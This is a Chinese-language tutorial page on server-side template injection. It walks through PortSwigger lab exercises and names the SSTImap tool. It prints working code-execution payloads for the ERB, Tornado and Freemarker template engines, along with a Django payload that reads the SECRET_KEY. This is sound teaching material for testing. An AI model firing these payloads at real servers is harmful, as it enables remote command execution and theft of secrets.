当前位置: 首页 > news >正文

Web攻防-SSTI服务端模版注入利用分类语言引擎数据渲染项目工具挖掘思路

知识点:
1、WEB攻防-SSTI-利用分类&功能点
2、WEB攻防-SSTI-利用项目&挖掘思路
在这里插入图片描述
SSTI(Server Side Template Injection) 服务器模板注入, 服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容。
参考:https://www.cnblogs.com/R3col/p/12746485.html
在这里插入图片描述

演示案例-WEB攻防-SSTI-利用分类&语言引擎&工具项目

1、SSTI利用思路

1、确定模板引擎
先判断目标使用什么语言,在对比图片确定大致范围。
使用wappalyzer插件来辅助识别
白盒看pom.xml调用的模板引擎
2、构造payload的思路
寻找可用对象(比如字符串、字典,或者已给出的对象)
通过可用对象寻找原生对象(object)
利用原生对象实例化目标对象(比如os)
执行代码
3、如果手工有困难,可用使用Tqlmap或SSTImap代替

2、黑盒-SSTI测试

靶场地址:https://portswigger.net/web-security/all-labs#server-side-template-injection

ERB模板

在这里插入图片描述

<%= exec 'ls -al' %>

在这里插入图片描述

Tornado模板

在这里插入图片描述
在这里插入图片描述

blog-post-author-display=user.name}}{{7*7}}

在这里插入图片描述
在这里插入图片描述

blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('ls%20-al')

在这里插入图片描述
在这里插入图片描述

Freemarker模板

在这里插入图片描述

<#assign test="freemarker.template.utility.Execute"?new()> ${test("ls")}

在这里插入图片描述

Django模板

{{settings.SECRET_KEY}} //获取key

在这里插入图片描述
在这里插入图片描述

3、白盒挖掘

https://forum.butian.net/share/1229

4、工具项目-SSTImap

https://github.com/vladko312/SSTImap
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://www.lryc.cn/news/585655.html

相关文章:

  • 华为认证笔试考试中心/VUE考场考试规则与环境欣赏
  • 智慧水文站系统:实时监控、全要素监测与AI辅助
  • 爬虫练习1
  • 数据库报错:Column ‘xxx‘ in field list is ambiguous
  • pyQt基础4(对话框)
  • JAX study notes[16]
  • Java项目中图片加载路径问题解析
  • Python Day10
  • LLM场景下的强化学习【GRPO】
  • Spring Boot整合MyBatis+MySQL实战指南(Java 1.8 + 单元测试)
  • 上位机知识篇---端口
  • latex格式中插入eps格式的图像的编译命令
  • 异步复习(线程)
  • 【第四节】ubuntu server安装docker
  • 从0开始学习R语言--Day44--LR检验
  • 文章发布易优CMS(Eyoucms)网站技巧
  • 企业IT管理——医院数据备份与存储制度模板
  • Linux自动化构建工具(一)
  • 多表查询-2-多表查询概述
  • 蔚来测开一面:HashMap从1.7开始到1.8的过程,既然都解决不了并发安全问题,为什么还要进一步解决环形链表的问题?
  • 前端面试专栏-算法篇:23. 图结构与遍历算法
  • USB一线连多屏?Display Link技术深度解析
  • React中Redux基础和路由介绍
  • 适配多场景,工业显示器让操作更高效
  • 前端八股-promise
  • Spring的事务控制——学习历程
  • C++设计秘籍:为什么所有参数都需类型转换时,非成员函数才是王道?
  • Python-正则表达式-信息提取-滑动窗口-数据分发-文件加载及分析器-浏览器分析-学习笔记
  • (补充)RS422
  • Qt 实现新手引导